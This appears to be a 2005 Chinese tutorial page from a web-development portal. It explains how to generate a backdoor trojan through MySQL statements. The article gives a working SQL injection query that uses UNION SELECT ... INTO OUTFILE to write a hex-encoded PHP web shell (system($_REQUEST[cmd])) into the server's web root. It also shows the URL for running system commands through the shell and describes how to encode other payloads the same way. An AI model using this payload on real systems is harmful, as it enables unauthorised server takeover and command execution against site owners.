网络编程 | 站长之家 | 网页制作 | 图形图象 | 操作系统 | 冲浪宝典 | 软件教学 | 网络办公 | 邮件系统 | 网络安全 | 认证考试 | 系统进程
Firefox | IE | Maxthon | 迅雷 | 电驴 | BitComet | FlashGet | QQ | QQ空间 | Vista | 输入法 | Ghost | Word | Excel | wps | Powerpoint
asp | .net | php | jsp | Sql | c# | Ajax | xml | Dreamweaver | FrontPages | Javascript | css | photoshop | fireworks | Flash | Cad | Discuz!
当前位置 > 网站建设学院 > 网络编程 > 数据库 > MySQL教程
Tag:注入,存储过程,分页,安全,优化,xmlhttp,fso,jmail,application,session,防盗链,stream,无组件,组件,md5,乱码,缓存,加密,验证码,算法,cookies,ubb,正则表达式,水印,索引,日志,压缩,base64,url重写,上传,控件,Web.config,JDBC,函数,内存,PDF,迁移,结构,破解,编译,配置,进程,分词,IIS,Apache,Tomcat,phpmyadmin,Gzip,触发器,socket
数据库:数据库教程,数据库技巧,Oracle教程,MySQL教程,Sybase教程,Access教程,DB2教程,数据库安全,数据库文摘
本月文章推荐
.在MySQL数据库中应当如何关闭错误.
.Mysql5写中文乱码问题解决.
.MySQL使用范围扩展 与ASP.NET配合.
.MySQL数据库的漏洞相当于其它数据.
.看紧你的3306端口,一次通过mysq.
.Mysql数据库的安全配置、实用技巧.
.MySQL安全问题(匿名用户)的一点心.
.个人经验总结:MySQL数据库优化技.
.巧用MySQL InnoDB引擎锁机制解决.
.万里开源携手MySQL数据库 共建中.
.将数据从MySQL迁到Oracle的几点注.
.mysql存储过程及c#调用标准版.
.数据库管理员必须了解的MySQL企业.
.linux下mysql的一点基本用法.
.MySQL的数据类型和建库策略.
.Mysql 安全注意事项.
.教你如何编写高效的MySQL数据库应.
.Linux自动备份MySQL数据库的实用.
.MYSQL出错代码列表.
.实例讲解如何利用crontab定时备份.

通过Mysql的语句生成后门木马的方法

发表日期:2005-4-3


通过Mysql 的语句生成后门木马的方法!

SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'

通过Mysql 的注入或者在 phpmyadmin 里运行以上语句,则会C:/inetpub/wwwroot/下生成 cmd.php 文件,内容为原来的 vbb_strikes 内容,后面紧跟着:

2 3 <?php system($_REQUEST[cmd]);?>

再通过 http://www.xxx.com/cmd.php?cmd=dir c:\ 就可以执行系统DOS命令!

哪串0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E是什么东西?

就是<?php system($_REQUEST[cmd]);?>的十六进制编码了,如果不用这种方法,有不同的SQL版本会出现其它的编码:如%xx之类的,哪这个后门就不能执行的了!如果你有其它语名要弄,可以到UltraEdit里输入,再按[Ctrl+H]键,将里面的十六进制连在一起就可以了!

上一篇:MYSQL数据同步备份复制 人气:16891
下一篇:MySQL中修改密码及访问限制设置详解 人气:11296
浏览全部MySQL的内容 Dreamweaver插件下载 网页广告代码 祝你圣诞节快乐 2009年新年快乐